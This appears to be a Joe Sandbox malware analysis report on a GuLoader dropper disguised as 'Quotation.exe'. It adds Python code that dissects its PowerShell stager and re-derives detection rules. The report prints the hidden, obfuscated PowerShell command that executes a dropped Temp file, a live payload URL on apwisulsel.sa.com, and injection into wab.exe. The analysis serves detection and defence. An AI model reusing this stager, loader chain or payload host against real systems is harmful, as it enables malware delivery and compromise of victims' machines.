Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:Quotation.exe
Analysis ID:1417386
MD5:833003bdb504ba4d779a2aff899859e0
SHA1:8acb52c29e7edc16e99a1dcf96f2a9abc6045771
SHA256:076191d0ad7379e339a2824bb74c2c1906477a32be3f92318c436500cdcf0af9

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Dosfuscation Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64_ra
  • Quotation.exe (PID: 2136 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 833003BDB504BA4D779A2AFF899859E0)
    • powershell.exe (PID: 4360 cmdline: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6196 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 7040 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • svchost.exe (PID: 6276 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
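The powershell.exe command line in the tree above is the whole stager: read a dropped file, cut a three-character substring out of it at a fixed offset, and dot-source that substring as a command with the file content as its argument. The following Python dissects that pattern. It is an added example, not part of the Joe Sandbox report: the command line is the one the report shows, but the file content is constructed (the real Bowleres.Hed is not on the page), and the assumption that the three characters at offset 58707 spell "IEX" is ours.

```python
"""Dissect the PowerShell stager from the process tree above (PID 4360).

Added example; not part of the Joe Sandbox report. STAGER_CMDLINE is the
command line the report shows. SAMPLE_BLOB is CONSTRUCTED: the real
Bowleres.Hed is not on the page, and "IEX" at offset 58707 is an assumption.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Verbatim from the report's process tree (powershell.exe, PID 4360).
STAGER_CMDLINE = (
    '"powershell" -windowstyle hidden "$Betalingsdages=Get-Content '
    "'C:\\Users\\user\\AppData\\Local\\Temp\\springvandenes\\Intransparency\\Bowleres.Hed';"
    '$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"'
)

# $blob = Get-Content '<file>'; $cmd = $blob.SubString(<off>,<len>); .$cmd($blob)
STAGER_RE = re.compile(
    r"\$(?P<blob>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=blob)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;"
    r"\s*\.\s*\$(?P=cmd)\s*\(\s*\$(?P=blob)\s*\)",
    re.IGNORECASE,
)

# Three-letter PowerShell alias a stager of this shape is expected to spell:
# iex (Invoke-Expression) turns the rest of the file into executed code.
KNOWN_ALIASES = {"iex": "Invoke-Expression"}


@dataclass(frozen=True)
class Stager:
    script_path: str  # file whose content is both the command name and its argument
    offset: int       # start of the command-name substring inside the file
    length: int       # its length (3 in this sample)


def parse_stager(cmdline: str) -> Optional[Stager]:
    """Recognise the Get-Content / SubString / .$var(...) pattern and extract its parameters."""
    m = STAGER_RE.search(cmdline)
    if m is None:
        return None
    return Stager(m["path"], int(m["off"]), int(m["len"]))


def resolve_command(stager: Stager, file_text: str) -> str:
    """Return the command name that .$cmd(...) resolves to for a given file content.

    Get-Content yields one string per line, so .SubString() on its result only
    works if the file is a single line; that is enforced here. Offsets count
    UTF-16 units in .NET and code points in Python, identical for ASCII.
    """
    lines = file_text.splitlines()
    if len(lines) != 1:
        raise ValueError(f"stager expects a single-line file, got {len(lines)} lines")
    end = stager.offset + stager.length
    if end > len(lines[0]):
        raise ValueError("offset runs past the end of the file")
    return lines[0][stager.offset:end]


def explain(cmdline: str, file_text: str) -> dict:
    """Summarise what the stager does once the dropped file's content is known."""
    st = parse_stager(cmdline)
    if st is None:
        return {"matched": False}
    token = resolve_command(st, file_text)
    return {
        "matched": True,
        "script_path": st.script_path,
        "offset": st.offset,
        "token": token,
        "resolves_to": KNOWN_ALIASES.get(token.lower(), token),
        "from_temp": "\\appdata\\local\\temp\\" in st.script_path.lower(),
    }


# CONSTRUCTED stand-in for Bowleres.Hed: filler up to the offset, the command
# token, then whatever the second stage would be. Not the real file.
SAMPLE_BLOB = "A" * 58707 + "IEX" + " # ...second-stage PowerShell would follow here..."

if __name__ == "__main__":
    print(explain(STAGER_CMDLINE, SAMPLE_BLOB))
```

The value of the check is that the command name never appears on the command line, so a keyword match for "Invoke-Expression" or "IEX" misses it; the offset plus the dropped file are what an analyst needs to recover it, and the regex above is what a detection rule has to key on instead (Get-Content of a Temp path, SubString, and a variable invoked with a leading dot).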
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.2383373007.0000000005D2E000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000002.00000002.2098766772.000000000D38C000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", CommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation.exe", ParentImage: C:\Users\user\Desktop\Quotation.exe, ParentProcessId: 2136, ParentProcessName: Quotation.exe, ProcessCommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", ProcessId: 4360, ProcessName: powershell.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 6196, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", CommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation.exe", ParentImage: C:\Users\user\Desktop\Quotation.exe, ParentProcessId: 2136, ParentProcessName: Quotation.exe, ProcessCommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", ProcessId: 4360, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6276, ProcessName: svchost.exe
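The Sigma hits above can be re-derived from the process tree alone. The Python below does that as an added example; it is not part of the Joe Sandbox report and is not the Sigma rules' own logic (the three checks are simplified approximations written for this page). The process records are transcribed from the report's process tree, parent links follow the tree's indentation and the ParentProcessId fields above, and INJECTION_TARGETS is an assumed watchlist rather than something the report states.

```python
"""Re-derive the process-tree findings above from the tree itself.

Added example; not part of the Joe Sandbox report and not the Sigma rules'
own logic (the checks are simplified approximations). PROCESSES is transcribed
from the report's process tree; INJECTION_TARGETS is an assumed watchlist.
"""
import re

PROCESSES = [
    {"pid": 2136, "ppid": None,
     "image": r"C:\Users\user\Desktop\Quotation.exe",
     "cmdline": r'"C:\Users\user\Desktop\Quotation.exe"'},
    {"pid": 4360, "ppid": 2136,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"powershell" -windowstyle hidden "$Betalingsdages=Get-Content '
                r"'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';"
                r'$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"'},
    {"pid": 396, "ppid": 4360,
     "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 6196, "ppid": 4360,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"'},
    {"pid": 7040, "ppid": 4360,
     "image": r"C:\Program Files (x86)\windows mail\wab.exe",
     "cmdline": r'"C:\Program Files (x86)\windows mail\wab.exe"'},
    {"pid": 6276, "ppid": 656,
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Signed Microsoft binaries loaders of this family are commonly hollowed into (assumed watchlist).
INJECTION_TARGETS = {"wab.exe", "ieinstal.exe", "caspol.exe", "regasm.exe",
                     "regsvcs.exe", "msbuild.exe", "installutil.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def script_from_temp(proc: dict) -> bool:
    """Script host whose command line pulls content from the user's Temp directory."""
    return basename(proc["image"]) in SCRIPT_HOSTS and TEMP_RE.search(proc["cmdline"]) is not None


def dosfuscation(proc: dict) -> bool:
    """cmd.exe with caret escapes. In "set /A 1^^0" the doubled caret is cmd's
    escape for a literal ^, so set /A evaluates 1 XOR 0: a do-nothing
    expression whose only purpose is to look unusual."""
    return basename(proc["image"]) == "cmd.exe" and proc["cmdline"].count("^") >= 2


def lolbin_spawned_by_script_host(proc: dict, by_pid: dict) -> bool:
    """Watchlisted signed binary started argument-less by a script host: the
    shape of a hollowing target (cf. "Creates a process in suspended mode" and
    "Writes to foreign memory regions" in the signature list)."""
    parent = by_pid.get(proc["ppid"])
    if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
        return False
    argument_less = proc["cmdline"].strip().strip('"').lower() == proc["image"].lower()
    return argument_less and basename(proc["image"]) in INJECTION_TARGETS


def evaluate(processes: list) -> set:
    """Return {(pid, rule_name)} for every process that trips a check."""
    by_pid = {p["pid"]: p for p in processes}
    findings = set()
    for p in processes:
        if script_from_temp(p):
            findings.add((p["pid"], "script_from_temp"))
        if dosfuscation(p):
            findings.add((p["pid"], "dosfuscation"))
        if lolbin_spawned_by_script_host(p, by_pid):
            findings.add((p["pid"], "lolbin_spawned_by_script_host"))
    return findings


def ancestry(pid: int, processes: list) -> list:
    """Image names from the root of the tree down to pid (the injection chain for wab.exe)."""
    by_pid = {p["pid"]: p for p in processes}
    chain, p = [], by_pid.get(pid)
    while p is not None:
        chain.append(basename(p["image"]))
        p = by_pid.get(p["ppid"])
    return chain[::-1]


if __name__ == "__main__":
    for pid, rule in sorted(evaluate(PROCESSES)):
        print(pid, rule, " -> ".join(ancestry(pid, PROCESSES)))
```

Two points worth noting from the output: the svchost.exe BITS process has no parent in the tree and trips nothing, which matches its status as a host service rather than a child of the sample; and wab.exe is the only process whose ancestry runs Quotation.exe -> powershell.exe -> wab.exe, which is why the wab.exe memory dump (process index 0000000E) is where the Yara rule and the apwisulsel.sa.com strings later turn up.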
      No Snort rule has matched

      AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware (note: this string sits in powershell.exe memory next to https://github.com/Pester/Pester and the Apache licence URL, i.e. it is the icon URL from the manifest of the Pester module that PowerShell loads; the reputation hit is noise, not sample infrastructure)
Source: C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe | ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe | Virustotal: Detection: 15%
Source: Quotation.exe | ReversingLabs: Detection: 58%
Source: Quotation.exe | Virustotal: Detection: 15%
Source: Quotation.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Quotation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000002.00000002.2094251518.0000000008BCE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbl source: powershell.exe, 00000002.00000002.2090205765.00000000076A3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2083067727.0000000003231000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2083067727.000000000320F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2083067727.000000000320F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2083067727.0000000003231000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ws\System.Core.pdbE source: powershell.exe, 00000002.00000002.2094251518.0000000008BCE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData
Source: Joe Sandbox View | IP Address: 104.128.228.214
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: apwisulsel.sa.com
Source: powershell.exe, 00000002.00000002.2094251518.0000000008B8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microz;r
Source: svchost.exe, 00000005.00000002.2392550483.0000022135C00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Quotation.exe, Quotation.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Quotation.exe, Quotation.exe.2.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Quotation.exe, Quotation.exe.2.dr | String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2084166984.0000000005191000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quotation.exe, Quotation.exe.2.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Quotation.exe, Quotation.exe.2.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Quotation.exe, Quotation.exe.2.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2094251518.0000000008B30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coiJa
Source: powershell.exe, 00000002.00000002.2084166984.0000000005191000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
Source: wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/
Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/$
Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/(
Source: wab.exe, 0000000E.00000002.2392316689.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/C
Source: wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2392316689.0000000006ED3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.bin
Source: wab.exe, 0000000E.00000002.2393553213.0000000006EE9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.2112888645.0000000006EE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.binW
Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.binb
Source: wab.exe, 0000000E.00000002.2393553213.0000000006EE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.bincf&
Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.bing
Source: wab.exe, 0000000E.00000002.2392316689.0000000006EC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.binoE
Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/lsel.sa.com/apwisulsel.sa.com5
Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apwisulsel.sa.com/r4
Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: Quotation.exe, Quotation.exe.2.dr | String found in binary or memory: https://d.symcb.com/cps0%
Source: Quotation.exe, Quotation.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0
Source: Quotation.exe, Quotation.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0.
Source: edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000005.00000003.1202909008.0000022135BB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Note on triage: the strings sourced from qmgr.db.5.dr, edb.log.5.dr and the BITS svchost.exe (edgedl.me.gvt1.com, f.c2r.ts.cdn.office.net, g.live.com) come from the analysis VM's own BITS job store and are background Chrome/Office/OneDrive update traffic, not sample activity; the nuget.org, contoso.com, pesterbdd.com and github.com/Pester strings are PowerShell module manifest fields loaded into powershell.exe; the symcb/symcd/symantec URLs are certificate-chain fields of the (invalid) Authenticode signature on Quotation.exe; and http://nsis.sf.net/NSIS_Error is the standard NSIS installer error string, consistent with the sample being an NSIS-packaged dropper. The only sample-related network indicators on this page are the DNS query for apwisulsel.sa.com and the https://apwisulsel.sa.com/EnPWajJ251.bin URL recovered from the memory of the injected wab.exe process (index 0000000E).
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712

      System Summary

Source: initial sample | Static PE information: Filename: Quotation.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe (dropped file)
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0835A678
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0835BFA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083521F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08352220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0835BF90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083A29B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083A45EA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083A55E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083AE390
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083A5A80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083A7C50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083A8D28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083A8330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083AE390
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083AE380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083AD528
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083F7BF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083F7BE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083F2698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083F2687
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089AAF69
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089AAF69
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089BE108
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089B8380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089BA3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089B9BA8
